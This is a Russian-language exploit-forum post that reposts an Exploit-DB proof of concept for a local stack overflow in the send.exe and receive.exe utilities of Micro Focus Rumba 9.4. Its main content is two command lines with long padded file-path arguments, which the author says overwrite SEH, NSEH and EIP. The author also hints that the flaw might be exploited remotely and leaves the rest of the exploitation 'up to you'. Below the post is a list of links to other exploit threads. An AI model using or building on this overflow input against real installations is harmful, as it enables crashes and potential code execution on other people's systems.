Exploit Micro Focus Rumba 9.4 - Local Denial of Service

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
40648
Проверка EDB
  1. Пройдено
Автор
UMIT AKSU
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2016-10-31
Micro Focus Rumba 9.4 - Local Denial of Service
Код: 
# Exploit Title: Micro Focus Rumba 9.4 Multiple Local Stack-overflow 
# Date: 29-10-2016
# Exploit Author: Umit Aksu
# Vendor Homepage: http://www.microfocus.com/
# Software Link: http://nadownloads.microfocus.com/epd/product_download_request.aspx?type=eval&transid=2179441&last4=2179441&code=40231
# Version: 9.4
# Tested on: Internet Explorer 11 on windows 7
# CVE : 


1. Description 

Multiple local stack overflow vulnerabilities which can used when to exploit when learning exploit development. 

Note: Rumba uses send.exe and receive.exe to send and receive files so it might be possible to exploit this remotely.


2. Proof of Concept

The code below sprayes the memory to have a valid memory address which can then be used to reference... the exploit code only makes it possible to overwrite the EIP the rest is up to you. 


C:\Program Files (x86)\Micro Focus\RUMBA\System>send c:\aaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
RUMBA Command-line File Transfer Utility

SEH + NSEH overwritten


C:\Program Files (x86)\Micro Focus\RUMBA\System>receive.exe c:\aaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaa C:\dddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
dddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
ddddddddddddddddddddddddaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
RUMBA Command-line File Transfer Utility
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit Micro Focus Rumba 9.3 - ActiveX Stack Buffer Overflow (PoC)
Ответы
0
Просмотры
624
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Micro Focus (HPE) Data Protector - SUID Privilege Escalation (Metasploit)
Ответы
0
Просмотры
733
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Micro Focus Filr 3.4.0.217 - Path Traversal / Local Privilege Escalation
Ответы
0
Просмотры
627
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities
Ответы
0
Просмотры
586
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Micro Focus Cobol 4.1 - Arbitrary Command Execution
Ответы
0
Просмотры
341
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Trend Micro Deep Security Agent 11 - Arbitrary File Overwrite
Ответы
0
Просмотры
719
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Trend Micro Email Encryption Gateway 5.5 (Build 1111.00) - Multiple Vulnerabilities
Ответы
0
Просмотры
843
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Trend Micro Anti-Threat Toolkit 1.62.0.1218 - Remote Code Execution
Ответы
0
Просмотры
653
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Trend Micro Threat Discovery Appliance 2.6.1062r1 - 'dlp_policy_upload.cgi' Remote Code Execution
Ответы
0
Просмотры
624
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection
Ответы
0
Просмотры
709
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу